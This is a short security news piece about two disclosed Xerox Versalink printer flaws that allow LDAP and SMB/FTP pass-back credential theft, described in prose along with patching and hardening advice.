Recent discoveries have highlighted significant security vulnerabilities in Xerox Versalink printers, potentially allowing cybercriminals to steal sensitive credentials. These issues, identified by Rapid7, involve LDAP and SMB flaws, specifically affecting firmware version 57.69.91 and earlier. It is crucial for organizations using these devices to update their firmware immediately to mitigate risks.

Understanding the Vulnerabilities

The vulnerabilities, labeled CVE-2024-12510 and CVE-2024-12511, enable attackers to perform "pass-back" attacks. These attacks exploit the printer's administrative functions to redirect authentication requests to a malicious server controlled by the attacker. By manipulating settings related to Lightweight Directory Access Protocol (LDAP), Server Message Block (SMB), and File Transfer Protocol (FTP), attackers can intercept sensitive information.

LDAP and SMB/FTP Exploits

The LDAP vulnerability allows an attacker to change the LDAP server's IP address within the printer's configuration. This alteration causes the printer to send authentication credentials to the attacker's server, where they can be captured in clear text. Similarly, the SMB/FTP vulnerability involves modifying the server's IP address in the user's address book, facilitating credential theft.

  • LDAP Exploit: Alters LDAP server IP to capture clear text credentials.
  • SMB/FTP Exploit: Redirects authentication to a rogue server, exposing credentials.

Potential Impact and Exploitation

Exploiting these vulnerabilities requires either administrative access to the printer's settings or physical access to the console. Remote access via the web interface is also possible if user-level control is enabled. The consequences are severe, as attackers could gain access to critical credentials, including those for Windows Active Directory, enabling lateral movement within a network.

Mitigation Strategies

Rapid7 has responsibly disclosed these vulnerabilities to Xerox, ensuring that patches are available. Organizations should upgrade to the latest firmware version without delay. If immediate patching is not feasible, it is recommended to implement strong, unique passwords for administrative accounts, avoid using domain administrator accounts for LDAP or scan-to-file services, and disable remote console access for unauthenticated users.

The link has been copied!